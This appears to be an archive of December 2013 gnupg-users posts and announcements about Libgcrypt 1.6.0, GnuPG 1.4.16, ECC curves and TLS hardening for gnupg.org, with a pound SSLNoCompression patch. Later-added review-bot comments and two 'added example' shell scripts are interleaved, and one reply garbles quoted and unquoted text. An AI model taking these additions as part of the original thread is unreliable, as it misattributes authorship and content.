Salam-Shalom, Werner
Re: show-uid-validity default to yes
On Fri, 13 Dec 2013 21:24, d...@fifthhorseman.net said:
> this sounds like an argument for being willing to change the human-readable output on the shell -- there are not many people looking at it anyway, and most of those people are sophisticated users.

It is a Unix tool and people want to have it as a Unix tool. The separation between a machine readable and the human interface is not a standard Unix tool property. Thus admins don't know about it.

> I think for a piece of critical security infrastructure, GPG has been supporting some insecure practices for far too long.

Why do you think this is insecure? Because gpg does not encrypt to a key and users work around this by using --always-trust?

> If you're referring to a specific script, please point me to it and its authors; i'll badger them as well; that's not a fun job, and there is no reason you should do it solo.

I can't point you to such scripts. Most software is not in public use but used in-house. Sometimes I receive bug reports or requests for help and then I notice these problems. Not much we can do about it. In fact, too many sites are using outdated versions because they fear things may break. Such breaks have been very rare with gpg and that is a good thing.

> presumably relates to people who *do* use gpg from the command line (they're actually scripting it!), and should know better. The way to

They implemented something and then it is never touched again.

> get people to learn about it is to go ahead and improve the UI.

I am willing to consider a change for 2.1 - that will anyway break things (no more secring.gpg).

Shalom-Salam, Werner
Re: Sharing/Storing a private key
On Sat, 14 Dec 2013 21:14, ekl...@gmail.com said:
> AFAIK, *is* an implementation of SSS. So, why would you write a new version?

FWIW, a few years ago, Phil Sutter wrote a daemon for GnuPG which implements secret key splitting. I don't have the URL handy, but it should be easy to find.

Salam-Shalom, Werner
[Announce] Libgcrypt 1.6.0 released
Hello!

The GNU project is pleased to announce the availability of Libgcrypt version 1.6.0. This is the new stable version of Libgcrypt with the API being mostly compatible to previous versions. Due to the removal of certain long deprecated functions this version introduces an ABI change.

Libgcrypt is a general purpose library of cryptographic building blocks. It is originally based on code used by GnuPG. It does not provide any implementation of OpenPGP or other protocols. Thorough understanding of applied cryptography is required to use Libgcrypt.

The main features of this version are performance improvements [3], better support for elliptic curves, new algorithms and modes, as well as API and internal cleanups. Better performance of public key algorithms, in particular for Curve25519, is planned for forthcoming releases. Note that the 1.5 series will enter end of life state on 2016-12-31.

Noteworthy changes between version 1.5.0 and 1.6.0:
===

* Removed the long deprecated gcry_ac interface. Thus Libgcrypt is no longer ABI compatible to previous versions if they used the ac interface.
* Removed the module register subsystem.
* The deprecated message digest debug macros have been removed. Use gcry_md_debug instead.
* Removed deprecated control codes.
* Improved performance of most cipher algorithms as well as for the SHA family of hash functions.
* Added support for the IDEA cipher algorithm.
* Added support for the Salsa20 and reduced Salsa20/12 stream ciphers.
* Added limited support for the GOST 28147-89 cipher algorithm.
* Added support for the GOST R 34.11-94 and R 34.11-2012 (Stribog) hash algorithms.
* Added a random number generator to directly use the system's RNG. Also added an interface to prefer the use of a specified RNG.
* Added support for the SCRYPT algorithm.
* Mitigated the Yarom/Falkner flush+reload side-channel attack on RSA secret keys. See http://eprint.iacr.org/2013/448 [CVE-2013-4242].
* Added support for Deterministic DSA as per RFC-6979.
* Added support for curve Ed25519.
* Added a scatter gather hash convenience function.
* Added several MPI and SEXP helper functions.
* Added support for negative numbers to gcry_mpi_print, gcry_mpi_aprint and gcry_mpi_scan.
* The algorithm ids GCRY_PK_ECDSA and GCRY_PK_ECDH are now deprecated. Use GCRY_PK_ECC if you need an algorithm id.
* Changed gcry_pk_genkey for ecc to only include the curve name and not the parameters. The flag param may be used to revert this.
* Added a feature to globally disable selected hardware features.
* Added debug helper functions.

For interface changes relative to the 1.5.0 release see below [4].

Download
===

Source code is hosted at the GnuPG FTP server and its mirrors as listed at http://www.gnupg.org/download/mirrors.html . On the primary server the source file and its digital signature are:

  ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.0.tar.bz2 (2441k)
  ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.0.tar.bz2.sig

This file is bzip2 compressed. A gzip compressed version is also available:

  ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.0.tar.gz (2866k)
  ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.0.tar.gz.sig

Due to the amount of changes we don't provide a patch file against 1.5.x. The SHA-1 checksums are:

  43283c0b41c41e3d3bc13c2d8f937dfe2aaa1a77  libgcrypt-1.6.0.tar.bz2
  03551121fe5b706532158667699f63b6e2606755  libgcrypt-1.6.0.tar.gz

Copying
===

Libgcrypt is distributed under the terms of the GNU Lesser General Public License (LGPLv2.1+). The helper programs as well as the documentation are distributed under the terms of the GNU General Public License (GPLv2+). The file LICENSES has notices about contributions that require that these additional notices are distributed.

Support
===

For help on developing with Libgcrypt you should read the included manual and optionally ask on the gcrypt-devel mailing list [1].

A listing with commercial support offers for Libgcrypt and related software is available at the GnuPG web site [2].

The driving force behind the development of Libgcrypt is my company g10 Code. Maintenance and improvement of Libgcrypt and related software takes up most of our resources. To allow us to continue our work on free software, we ask to either purchase a support contract, engage us for custom enhancements, or to donate money: http://g10code.com/gnupg-donation.html

Thanks
==

Many thanks to all who contributed to Libgcrypt development, be it bug fixes, code, documentation, testing or helping users. Special thanks to Jussi Kivilinna who did most of the performance improvement work.

Happy hacking,

  Werner

[1] http://www.gnupg.org/documentation/mailing-lists.html
[2]
Re: please give us safer defaults for gnupg
On Mon, 16 Dec 2013 18:37, adrela...@riseup.net said:
> [This was originally planned as an open letter, but I thought it might be better to hear your arguments beforehand.]

May I suggest to read the archives of just a few weeks to collect the reasons why suggestions of using SHA-512 are missing the point. Some folks here must have bleeding fingertips from repeating the arguments over and over.

Having said this, I like to appreciate that you have such a trust in us GnuPG hackers in that our coding practice and development environment is bug free at a level that only cracking algorithms is the danger to your data. I think it was Adi Shamir who said: Nobody breaks crypto algorithms; they work around the crypto.

Shalom-Salam, Werner
Re: Libgcrypt 1.6.0 released and gunpg 2.x
On Tue, 17 Dec 2013 05:23, shm...@riseup.net said:
> use the new 1.6.0, do i need to uninstall gnupg libgcrypt and then compile both again together, and re-install ?

1.6.0 has a new SO number so there are no runtime conflicts. However, to avoid building problems, better de-install or overwrite the 1.5.3 development files (static library (if built), header files, and libgcrypt-config). If you installed 1.5.3 yourself, simply installing 1.6.0 should do everything you need. I am not 100% sure that building gnupg 2.0 will work without problems - I only tested the latest 2.0 GIT version.

> gnupg 2.x would not work with the new libgcrypt if i just install it alone, would it ? (im sure i have to do it all again...)

No, you need to build gnupg again. Libgcrypt has a different ABI and thus a different SO number (20 on common Linux systems).

Salam-Shalom, Werner
Re: please give us safer defaults for gnupg
On Tue, 17 Dec 2013 00:11, adrela...@riseup.net said: compatibility, you can never reduce complexity. Less complexity means more simplicity, thus perhaps more usability. In my experience, projects [ You may want to start getting rid of software which is run on your computer without you being in control of it (noscript seems to be the Anti-virus software counterpart for the Web) ] Please tell me, what kind of argument would you accept? I guess you'd like to see loads of happy gpg users, gpg for the masses, etc. Would numbers convince you? I mean, What if alternative projects such as

The next step will be the move to ECC which increases the security while at the same time reducing the computation load and allowing for really short keys (e.g. 32 bytes)

Bitmessage etc. managed to get far more users while gpg passes into oblivion [while they objectively provide more/less security]?

There are many systems with more users than gpg. Actually most systems have more users. Think of Skype, Bittorrent, or even Jabber. I believe GnuPG is still a useful tool, much like zip or tar. As with many infrastructure systems you will notice it only if it stops working. No more off-line credit card processing, hardware supply chain breaks, no way to detect tampered software distributions etc, no way to send account data.

It is easy for centralized or semi-centralized systems to get usage statistics, for PGP (and to a lesser degree for S/MIME) it is much harder to get the figures. There are many keyservers running inside of many companies.

Shalom-Salam, Werner

ps. As a minor data point that OpenPGP is getting more attention might be the fact that the German Home Office has come around to prominently publish a PGP key at their contact page (576D4411C9AD3034). Funnily wrapped into a ZIP file, though. No hints for S/MIME or other encryption methods.
Re: X.509 certificates for https://gnupg.org
On Tue, 17 Dec 2013 04:05, mi...@micahflee.com said:
> torproject.org is pretty much an ideal example. They serve binaries of Tor Browser Bundle from https://www.torproject.org/ and have been attacked by governments all over the world, so they've put a lot of time and energy in doing things right. I'd like to see GPG have just as good

gnupg.org is a bit different in that in general we only provide source code and not ready to use binaries. Thus this is not a mainstream download site. Gpg4win.org, on the other hand, provides Windows installers and we [1] even acquired a code signing certificate so that users don't complain about the Windows message about "downloaded from the Internet; unknown issuer". It is well known that a lot of rogue software shows up as valid and signed software and that this code signing does not provide any security. However, users want that. Far fewer people complained about Intevation's own CA for https access to gpg4win.org.

I am unsure what to do about CA certificates - I don't trust the global PKIX at all. It lures users into false security. Thus, I believe CAcert is just as fine as any other - it can't be better because all root certificates are implicitly cross-signed (the browser treats them all the same).

> (And for that matter, why do I have two cookies in my browser that gnupg.org set? _pk_id.1.9e41 and _pk_ses.1.9e41 -- the id one is a unique id, which means it can be used to track my movements through that

You must be running with JavaScript enabled ;-). This seems to be from Piwik, which I recently installed to gather web statistics. I am not really happy with that but my campaign manager said that it is really needed and that organizations like the EFF also run Piwik. Our privacy policy says

  ** Analytics

  This website uses Piwik, a Free Software web analytics system, to monitor traffic on our Web sites. Piwik records the general geographical vicinity of visitors as well as their browser and operating system, and records their navigation within the sites. This helps us gauge the impact of our materials and improve our work. Our Piwik system preserves privacy by anonymizing visitors' IP addresses. This means that we will not store any personally identifiable information about you, even though your visit produces a record that our site was visited by someone. Piwik also respects the "[[http://donottrack.us/][Do Not Track]]" preference offered by some browsers, so if you have this option set, Piwik will ignore your visit entirely. Details of how Piwik protects privacy are on [[http://piwik.org/privacy/][their website]].

I guess we will eventually switch to log file statistics which basically returns the same information. And also tracks those who disabled JS - whether this is better or worse, I don't know.

Salam-Shalom, Werner

[1] g10 Code and Intevation, the latter being a company I often work with and co-run by yet another founder of the FSFE.
Re: Another step towards crowdfunding
On Mon, 16 Dec 2013 20:32, mi...@micahflee.com said:
> Ahh, it's good to know that gnupg.org is available for https. But I would guess a very small percentage of your visitors use it, or even know that it's available.

Well, browsers could first try to use https. Would it help them to provide a SRV record for this?

> If you want to fix this, you could make all incoming http traffic respond with a 301 redirect to https.

I am not sure whether this helps. If we eventually offer http download we could use https: for that instead. There is also a plan to provide a hidden Tor service.

> this (and because it's good practice and doesn't hurt) you could also set the HSTS header, which prevents browsers from accidentally (or being tricked into) loading the website over http:

Should be considered, I need to hack up Boa anyway.

> Also, looks like the CA is CAcert--an awesome CA, but not trusted by browsers by default. I'd suggest getting a cert from StartSSL [https://startssl.com/], since they're the only CA that gives certs for free. And a wildcard cert (for *.gnupg.org) ends up costing like $60 USD.

I hesitate to pay the highwaymen.

> Also, it would be great if the use of https could be done better. The Qualys SSL report gives https://gnupg.org/ an F (because of the CAcert issue), but even if you used a browser-trusted CA it still wouldn't be the best: https://www.ssllabs.com/ssltest/analyze.html?d=gnupg.org

Yes, there is the problem with the CAcert intermediate certificate - it is on my todo list to update this.

> I notice you're using Boa Webserver, and their docs don't seem to show how to do things like set custom http headers or mess with the

Adding headers is easy, as said. Boa does not do https. gnupg.org uses the pound proxy to implement https and redirection. I changed the cipher suite for gnupg.org to a quite restricted one. More to come.

Shalom-Salam, Werner
Re: X.509 certificates for https://gnupg.org
On Mon, 16 Dec 2013 21:35, d...@fifthhorseman.net said:
> Werner, if i can help with configuring or maintaining the web server for gnupg.org to address some of these issues, please let me know.

Yes, I have problems to figure out a working cipher list which also allows for IE. What DHE cipher suite may I use with IE given that I have only an RSA certificate. Or should I simply give up on PFS for IE users? The active ciphers are right now:

  ECDHE-RSA-AES128-SHA SSLv3 Kx=ECDH Au=RSA Enc=AES(128) Mac=SHA1
  DHE-RSA-AES128-SHA   SSLv3 Kx=DH   Au=RSA Enc=AES(128) Mac=SHA1
  DHE-RSA-AES256-SHA   SSLv3 Kx=DH   Au=RSA Enc=AES(256) Mac=SHA1

Shalom-Salam, Werner

p.s. Attached is my SSLNoCompression patch for Debian's pound in case someone is interested.

--- a/config.c 2013-12-17 13:15:09.0 +0100 +++ b/config.c 2013-12-17 13:20:16.0 +0100 @@ -76,7 +76,7 @@ static regex_t Err414, Err500, Err501, Err503, MaxRequest, HeadRemove, RewriteLocation, RewriteDestination; static regex_t Service, ServiceName, URL, HeadRequire, HeadDeny, BackEnd, Emergency, Priority, HAport, HAportAddr; static regex_t Redirect, RedirectN, TimeOut, Session, Type, TTL, ID, DynScale; -static regex_t ClientCert, AddHeader, SSLAllowClientRenegotiation, SSLHonorCipherOrder, Ciphers, CAlist, VerifyList, CRLlist, NoHTTPS11; +static regex_t ClientCert, AddHeader, SSLAllowClientRenegotiation, SSLHonorCipherOrder, SSLNoCompression, Ciphers, CAlist, VerifyList, CRLlist, NoHTTPS11; static regex_t Grace, Include, ConnTO, IgnoreCase, HTTPS, HTTPSCert, Disabled, Threads, CNName; static regmatch_t matches[5]; 
@@ -1057,6 +1057,14 @@ ssl_op_disable |= SSL_OP_CIPHER_SERVER_PREFERENCE; ssl_op_enable = ~SSL_OP_CIPHER_SERVER_PREFERENCE; } +} else if(!regexec(SSLNoCompression, lin, 4, matches, 0)) { +if (atoi(lin + matches[1].rm_so)) { +ssl_op_enable |= SSL_OP_NO_COMPRESSION; +ssl_op_disable = ~SSL_OP_NO_COMPRESSION; +} else { +ssl_op_disable |= SSL_OP_NO_COMPRESSION; +ssl_op_enable = ~SSL_OP_NO_COMPRESSION; +} } else if(!regexec(Ciphers, lin, 4, matches, 0)) { has_other = 1; if(res-ctx == NULL) @@ -1338,6 +1346,8 @@ || regcomp(AddHeader, ^[ \t]*AddHeader[ \t]+\(.+)\[ \t]*$, REG_ICASE | REG_NEWLINE | REG_EXTENDED) || regcomp(SSLAllowClientRenegotiation, ^[ \t]*SSLAllowClientRenegotiation[ \t]+([012])[ \t]*$, REG_ICASE | REG_NEWLINE | REG_EXTENDED) || regcomp(SSLHonorCipherOrder, ^[ \t]*SSLHonorCipherOrder[ \t]+([01])[ \t]*$, REG_ICASE | REG_NEWLINE | REG_EXTENDED) +|| regcomp(SSLNoCompression, ^[ \t]*SSLNoCompression[ \t]+([01])[ \t]*$, + REG_ICASE | REG_NEWLINE | REG_EXTENDED) || regcomp(Ciphers, ^[ \t]*Ciphers[ \t]+\(.+)\[ \t]*$, REG_ICASE | REG_NEWLINE | REG_EXTENDED) || regcomp(CAlist, ^[ \t]*CAlist[ \t]+\(.+)\[ \t]*$, REG_ICASE | REG_NEWLINE | REG_EXTENDED) || regcomp(VerifyList, ^[ \t]*VerifyList[ \t]+\(.+)\[ \t]*$, REG_ICASE | REG_NEWLINE | REG_EXTENDED) @@ -1498,6 +1508,7 @@ regfree(AddHeader); regfree(SSLAllowClientRenegotiation); regfree(SSLHonorCipherOrder); +regfree(SSLNoCompression); regfree(Ciphers); regfree(CAlist); regfree(VerifyList); --- a/pound.8 2013-12-17 13:19:36.0 +0100 +++ b/pound.8 2013-12-17 13:19:40.0 +0100 
@@ -514,6 +514,14 @@ supported. If the value is 2, insecure renegotiation is supported, with unpatched clients. /fBThis can lead to a DoS and a Man in the Middle attack!/fR Default value is 0. .TP +\fBSSLNoCompression\fR 0|1 +If this value is 1, the server will disable DEFLATE compression even if both server +and client supports it. In case compression is enabled an attacker with access to +encrypted network traffic can conduct a CRIME attack by making client issue requests +with specific character sequences and observing whether they got compressed or not, +indicating their presence in part of the request that is not under his control +(e.g. cookie headers). Default value is 0. +.TP \fBCAlist\fR CAcert_file Set the list of trusted CA's for this server. The CAcert_file is a file containing a sequence of CA certificates (PEM format). The names of the defined CA certificates ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
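Review bot: SSL_OP_NO_COMPRESSION only exists in OpenSSL 1.0.0 and later, so the new branch in the `@@ -1057,6 +1057,14 @@` hunk of config.c (and the matching regcomp/regfree lines) will not build against an older libssl; guard the three additions with `#ifdef SSL_OP_NO_COMPRESSION` or state the minimum OpenSSL version in the patch description. Also, as the hunk is shown here, `ssl_op_disable = ~SSL_OP_NO_COMPRESSION;` and `ssl_op_enable = ~SSL_OP_NO_COMPRESSION;` read as plain assignments that would overwrite every other option bit; the unchanged context line `ssl_op_enable = ~SSL_OP_CIPHER_SERVER_PREFERENCE;` has the same shape, so this is most likely `&=` lost in transit, but it is worth confirming that both new lines are `&=` like the SSLHonorCipherOrder branch they mirror.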
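Review bot: the pound.8 hunk documents `Default value is 0`, which leaves TLS compression negotiable unless the administrator opts out, the opposite of what the CRIME paragraph in the same hunk argues for; consider defaulting SSLNoCompression to 1, or at least recommending `SSLNoCompression 1` in the text. Two wording fixes in the same paragraph: "even if both server and client supports it" should read "support it", and "by making client issue requests" should read "by making the client issue requests".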
Re: Another step towards crowdfunding
On Tue, 17 Dec 2013 14:53, samt...@gnupg.org said:
> I could do that if others are happy with the idea. Any objections? Werner?

No.

Salam-Shalom, Werner
Re: encryption algorithm
On Tue, 17 Dec 2013 16:07, md...@nycap.rr.com said:
> Hi! What encryption algorithm do we use in OpenPGP

The default for the public key algorithm is RSA with 2048 bits. For the symmetric session key the default algorithms are AES256, AES192, AES128, CAST5-128, 3DES where gpg picks the best matching one depending on the capabilities of the recipients' keys. If all recipients have new keys they will all use AES256 (new is measured in years).
Re: X.509 certificates for https://gnupg.org
On Tue, 17 Dec 2013 18:52, d...@fifthhorseman.net said:
> I think it depends on what flavor of IE you're using (and what version of the underlying OS you're using as well). The version of schannel in

Seems so. I updated my Windows 7 box to IE11 with no channel. Maybe I need to update more. Anyway IE11 seems to be pretty new.

> If you want to be able to support these systems, you may need to add a low-priority Lowest Common Denominator ciphersuite to match them. Sadly, that seems likely to be TLS_RSA_WITH_3DES_EDE_CBC_SHA, unless

Okay, IE users are anyway on Windows. So why provide PFS for an OS that may have a direct path to Maryland anyway.

> supported by XP's native TLS stack). I've never even tried to get a DSA certificate for a web server from any member of the CA cartel. Have you?

No. I recall that I tried to get a certificate for mail use to test my DSA code in gpgsm but I was not able to get one. The customer then dropped the DSA support from the requirements list. For web servers this should be possible - why else do they add those algorithms. After all that could be a selling point for an E+V certificate - if they could only find a new color.

> lowest-common-denominator ciphersuite unless it's the only one they support, you should probably set SSLHonorCipherOrder 1 in your pound

Did exactly that for the g10code site by now. I'll fix the intermediate CAcert certificate problem tomorrow.

Salam-Shalom, Werner
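The settings this thread keeps returning to (the three active suites, SSLHonorCipherOrder 1, and the SSLNoCompression directive from the attached pound patch) as an added audit script; this is example code, not pound's or gnupg.org's configuration, and both ListenHTTPS blocks are constructed samples that assume a pound built with that patch.

```shell
#!/bin/sh
# Added example, not part of the thread or of pound itself: check a pound
# ListenHTTPS block for the settings discussed above. SSLNoCompression is
# the directive the posted patch adds; SSLHonorCipherOrder and Ciphers are
# standard pound directives (matched case-insensitively, as pound does).

# Constructed sample: compression left on, no server cipher preference,
# and a non-PFS suite (AES128-SHA, plain RSA key exchange) in the list.
WEAK_CFG='ListenHTTPS
    Address 0.0.0.0
    Port    443
    Cert    "/etc/pound/example.pem"
    SSLNoCompression 0
    Ciphers "AES128-SHA:DHE-RSA-AES128-SHA"
    Service
        BackEnd
            Address 127.0.0.1
            Port    80
        End
    End
End'

# Constructed sample: the three active suites from the message above, all
# with ephemeral (EC)DH, server preference enforced, compression disabled.
HARDENED_CFG='ListenHTTPS
    Address 0.0.0.0
    Port    443
    Cert    "/etc/pound/example.pem"
    SSLHonorCipherOrder 1
    SSLNoCompression 1
    Ciphers "ECDHE-RSA-AES128-SHA:DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA"
    Service
        BackEnd
            Address 127.0.0.1
            Port    80
        End
    End
End'

# has_directive CFG NAME VALUE: true if "NAME VALUE" appears as a directive.
has_directive() {
    printf '%s\n' "$1" |
        grep -Eiq "^[[:space:]]*$2[[:space:]]+$3[[:space:]]*$"
}

# cipher_list CFG: print the quoted value of the Ciphers directive, if any.
cipher_list() {
    printf '%s\n' "$1" |
        sed -n 's/^[[:space:]]*Ciphers[[:space:]]*"\([^"]*\)".*/\1/p'
}

# pound_tls_findings CFG: print one finding per line and return their
# count, so a return value of 0 means the block passes every check.
pound_tls_findings() {
    cfg=$1
    n=0
    if ! has_directive "$cfg" SSLHonorCipherOrder 1; then
        echo "SSLHonorCipherOrder is not 1: the client's cipher preference wins"
        n=$((n + 1))
    fi
    if ! has_directive "$cfg" SSLNoCompression 1; then
        echo "SSLNoCompression is not 1: TLS compression stays negotiable"
        n=$((n + 1))
    fi
    # Every suite should use ephemeral (EC)DH, so that a later compromise
    # of the RSA certificate key does not expose recorded sessions.
    for suite in $(cipher_list "$cfg" | tr ':' ' '); do
        case $suite in
            DHE-*|ECDHE-*) ;;
            *) echo "non-PFS cipher suite enabled: $suite"; n=$((n + 1)) ;;
        esac
    done
    return $n
}
```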
Re: gpgsm and encrypt-to
On Tue, 17 Dec 2013 18:32, clou...@informationelle-selbstbestimmung-im-internet.de said:
> gpgsm has the option encrypt-to, which is not mentioned in the man page. Is that option stable or might it disappear in the future?

It is stable - just missing in the man page.

Shalom-Salam, Werner
Re: gpgsm and trusted keys
On Tue, 17 Dec 2013 18:57, clou...@informationelle-selbstbestimmung-im-internet.de said:
> Is there a way to mark intermediate CAs as trusted so that all certificates issued by them become usable?

Sorry, there is currently no such way. The code always walks up to the root.

Shalom-Salam, Werner
Re: ECC curves used in gnupg?
On Tue, 17 Dec 2013 20:01, anth...@cajuntechie.org said:
> I know that gnupg is experimenting with ECC and I'm wondering which curves the team has decided to use. I know there are some curves that are now suspected of being tainted by the NSA through NIST. Has the gnupg team ruled using those curves out?

We will support the curves specified in RFC-6637. These are the NIST curves P-256, P-384, and P-521. I recently added support for Brainpool P256r1, P384r1, and P512r1 to make some European governments happy.

In the wake of recent events and due to the fear of many people that the NIST curves might have some secret properties, I added support for Bernstein et al's Ed25519 signature scheme. The problem here is that it is not really covered by RFC-6637 because it does not use the ECDSA signature scheme but a Schnorr like scheme named EdDSA. Thus for a proper implementation we need to assign a new algorithm number to it which in turn means to write another RFC.

I recently met with Phil Zimmermann and we talked about the OpenPGP future. It is pretty clear that we need to replace the current algorithms with elliptic curves to get a better security margin for the future. Although there are no technical reasons not to use existing standard curves, we better take the users' unhappiness with NIST curves into account and move on to curves like Ed25519 which are easier to use and are an outcome of public research. Bernstein and Lange are currently working on a 384 bit curve and it is very likely that this one will also be added to GnuPG.

Salam-Shalom, Werner
Re: encryption algorithm
On Wed, 18 Dec 2013 02:27, r...@sixdemonbag.org said:
> because you just shifted to arguing that since GnuPG defaults to AES-256, we need to use RSA-15000 by default otherwise the asymmetric

FWIW: The rationale why we use the order AES256,192,128 is for compatibility reasons with PGP. If gpg would define AES128 first, we would get the somewhat confusing situation:

  gpg -r pgpkey -r gpgkey   ---gives--  AES256
  gpg -r gpgkey -r pgpkey   ---gives--  AES

PGP prefers AES256 for the simple reason that the marketing department told the engineering that 256 sounds stronger than 128 (according to one of their lead developers).

Shalom-Salam, Werner
[Announce] [security fix] GnuPG 1.4.16 released
to check that the version of GnuPG which you are going to install is an original and unmodified one, you can do it in one of the following ways:

* If you already have a trusted version of GnuPG installed, you can simply check the supplied signature. For example to check the signature of the file gnupg-1.4.16.tar.bz2 you would use this command:

    gpg --verify gnupg-1.4.16.tar.bz2.sig

  This checks whether the signature file matches the source file. You should see a message indicating that the signature is good and made by that signing key. Make sure that you have the right key, either by checking the fingerprint of that key with other sources or by checking that the key has been signed by a trustworthy other key. Note, that you can retrieve the signing key using the command

    finger wk ,at' g10code.com | gpg --import

  or using a keyserver like

    gpg --recv-key 4F25E3B6

  The distribution key 4F25E3B6 is signed by the well known key 1E42B367. If you get a key expired message, you should retrieve a fresh copy as the expiration date might have been prolonged.

  NEVER USE A GNUPG VERSION YOU JUST DOWNLOADED TO CHECK THE INTEGRITY OF THE SOURCE - USE AN EXISTING GNUPG INSTALLATION!

* If you are not able to use an old version of GnuPG, you have to verify the SHA-1 checksum. Assuming you downloaded the file gnupg-1.4.16.tar.bz2, you would run the sha1sum command like this:

    sha1sum gnupg-1.4.16.tar.bz2

  and check that the output matches the first line from the following list:

    0bf5e475f3eb6f33d5474d017fe5bf66070e43f4  gnupg-1.4.16.tar.bz2
    ea40324a5b2e3a16ffb63ea0ccc950a3faf5b11c  gnupg-1.4.16.tar.gz
    ead70b47218ba76da51c16b652bee2a712faf2f6  gnupg-1.4.15-1.4.16.diff.bz2
    82079c7c183467b4dd3795ca197983cd2494cec4  gnupg-w32cli-1.4.16.exe

Internationalization
===

GnuPG comes with support for 29 languages. The Chinese (Simple and Traditional), Czech, Danish, Dutch, French, German, Norwegian, Polish, Romanian, Russian, Spanish, Swedish, Ukrainian, and Turkish translations are close to complete.

Support
===

A listing with commercial support offers for GnuPG is available at: http://www.gnupg.org/service.html

The driving force behind the development of GnuPG is the company of its principal author, Werner Koch. Maintenance and improvement of GnuPG and related software take up most of their resources. To allow them to continue their work they ask to either purchase a support contract, engage them for custom enhancements, or to donate money: http://g10code.com/gnupg-donation.html

Thanks
==

We have to thank all the people who helped with this release, be it testing, coding, translating, suggesting, auditing, donating money, spreading the word, or answering questions on the mailing lists. Many thanks to Eran Tromer for providing early drafts of the paper and testing the fixes.

Happy Hacking,

  The GnuPG Team
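The two verification paths the announcement lists (detached signature checked with an already installed GnuPG, SHA-1 list as the fallback) as added shell functions; this is example code, not part of the announcement, the digest list is the one published above, and the test file is constructed.

```shell
#!/bin/sh
# Added example, not from the announcement: the two verification paths it
# describes, as shell functions. The digest list is the published one; the
# helper names and everything else here are this example's own.

# SHA-1 digests as published above, in sha1sum's "digest  filename" format.
GNUPG_1_4_16_SHA1='0bf5e475f3eb6f33d5474d017fe5bf66070e43f4  gnupg-1.4.16.tar.bz2
ea40324a5b2e3a16ffb63ea0ccc950a3faf5b11c  gnupg-1.4.16.tar.gz
ead70b47218ba76da51c16b652bee2a712faf2f6  gnupg-1.4.15-1.4.16.diff.bz2
82079c7c183467b4dd3795ca197983cd2494cec4  gnupg-w32cli-1.4.16.exe'

# sha1_of FILE: print the file's SHA-1 with whichever tool is installed.
sha1_of() {
    if command -v sha1sum >/dev/null 2>&1; then
        sha1sum "$1" | awk '{ print $1 }'
    else
        shasum -a 1 "$1" | awk '{ print $1 }'
    fi
}

# expected_sha1 LIST NAME: print the published digest for NAME, or nothing
# if the file is not covered by the list.
expected_sha1() {
    printf '%s\n' "$1" | awk -v f="$2" '$2 == f { print $1; exit }'
}

# check_sha1 FILE [LIST]: return 0 if FILE matches its published digest,
# 1 on a mismatch, 2 if the file name is not in the list at all.
check_sha1() {
    list=${2:-$GNUPG_1_4_16_SHA1}
    want=$(expected_sha1 "$list" "$(basename "$1")")
    [ -n "$want" ] || return 2
    [ "$(sha1_of "$1")" = "$want" ]
}

# verify_release FILE: prefer the detached OpenPGP signature, checked with
# the GnuPG that is already installed (never the copy just downloaded);
# fall back to the SHA-1 list only when no gpg or no .sig is available.
verify_release() {
    if command -v gpg >/dev/null 2>&1 && [ -f "$1.sig" ]; then
        gpg --verify "$1.sig" "$1"
    else
        check_sha1 "$1"
    fi
}
```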
Re: Another step towards crowdfunding
On Tue, 17 Dec 2013 20:40, c...@rheloud.net said:

> How about an RSS-Feed.

We used to have one for the News. It is currently disabled but will come back with the new website.

Shalom-Salam,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: FAQ? Re: please give us safer defaults for gnupg
On Wed, 18 Dec 2013 16:09, bernh...@intevation.de said:

> What about placing this as an FAQ in the wiki.gnupg.org?

We have a FAQ which answers a lot of questions around key sizes in the “Advanced Topics” section. If something is missing it can easily be added.

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
Re: gpg-rsa-key decryption with a mobile
On Wed, 18 Dec 2013 18:31, sys...@ioioioio.eu said:

> Here, we describe a new acoustic cryptanalysis key extraction attack, applicable to GnuPG's current implementation of RSA. The attack can

Well that is what I posted a few hours ago to this list ;-).

Salam-Shalom,

   Werner

-- 
Thoughts are free. Exceptions are regulated by a federal law.
[Announce] GnuPG launches crowdfunding campaign
GnuPG encryption project launches crowdfunding campaign

Today GNU Privacy Guard (GnuPG) has launched its first crowdfunding campaign [1] with the aim of building a new website and long term infrastructure. The 24.000 EUR target will fund:

- Fresh web interfaces for gnupg.org including mobile
- Completion and release of GnuPG 2.1
- Anonymous Tor network access to the website
- A new user friendly download page suitable for all devices
- A new server for web services
- New pages convening external guides, videos, and handbooks
- Facilities for processing recurring donations for long term project support

Project founder and Lead Developer Werner Koch said “GnuPG has seen a huge upsurge in popularity following recent state spying revelations. After 16 years of continuous development, we are now asking for community support to capitalise on consumer demand for privacy, and make GnuPG easy to access for mainstream audiences”.

GnuPG is one of the few tools remaining above suspicion in the wake of leaked NSA documents. Edward Snowden and his contacts including Bruce Schneier switched to GnuPG when they began handling the secret documents earlier this year [2]. The Wall Street Journal, The Committee to Protect Journalists, and ProPublica [3] have all embraced GnuPG for protection of staff and sources. Phil Zimmermann, original inventor of Pretty Good Privacy (PGP), has also moved to GnuPG in the wake of the news.

“GnuPG is a key part of modern privacy infrastructure” said Sam Tuke, Campaign Manager, GnuPG. “Millions of users rely on GnuPG to work securely on servers, laptops and smartphones, but 2013 donations totaling 3.000 EUR to date have not even covered fixed costs. Supporting new algorithms like elliptical curve and fixing newfound exploits fast takes a lot of work which is done voluntarily. Now is the time for people to contribute to making GnuPG slick and more sustainable in future”.

Jacob Appelbaum, Tor Project developer, added “GnuPG is important - it allows us the assurances we need to do our work. Community funding is a critical part of a confident outlook for GnuPG in future.”

For further information, please contact Sam Tuke.
Email: samtuke [at] gnupg.org
Phone: +49 176 81923811

[1] http://goteo.org/project/gnupg-new-website-and-infrastructure
[2] http://www.theguardian.com/world/2013/sep/05/nsa-how-to-remain-secure-surveillance
[3] http://www.cjr.org/behind_the_news/hacks_hackers_security_for_jou.php

== About GNU Privacy Guard ==

